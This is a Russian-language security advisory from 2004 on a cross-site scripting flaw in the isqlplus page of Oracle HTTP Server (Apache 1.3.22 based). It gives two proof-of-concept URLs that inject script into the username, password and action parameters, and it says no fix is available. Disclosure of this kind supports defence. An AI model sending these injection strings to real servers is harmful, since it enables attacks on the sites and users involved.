Межсайтовый скриптинг в Oracle HTTP Server

Дата публикации:
27.01.2004
Дата изменения:
27.01.2004
Всего просмотров:
889
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: Oracle HTTP Based on Apache 1.3.22

Описание: Уязвимость в проверке правильности входных данных обнаружена в Oracle HTTP Server. Удаленный пользователь может выполнить XSS нападение.

Пример/Эксплоит:


http://[target]/isqlplus?action=logon&username=sdfds%22% 3e%3cscript%3ealert('X
SS')%3c/script%3e\&password=dsfsd%3cscript%3ealert('XSS')%3c/script%3e

http://[target]/isqlplus?action=<script>alert('XSS')</script>

URL производителя: http://www.oracle.com/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: acle HTTP Server Cross Site Scripting Vulnerabillity

или введите имя

CAPTCHA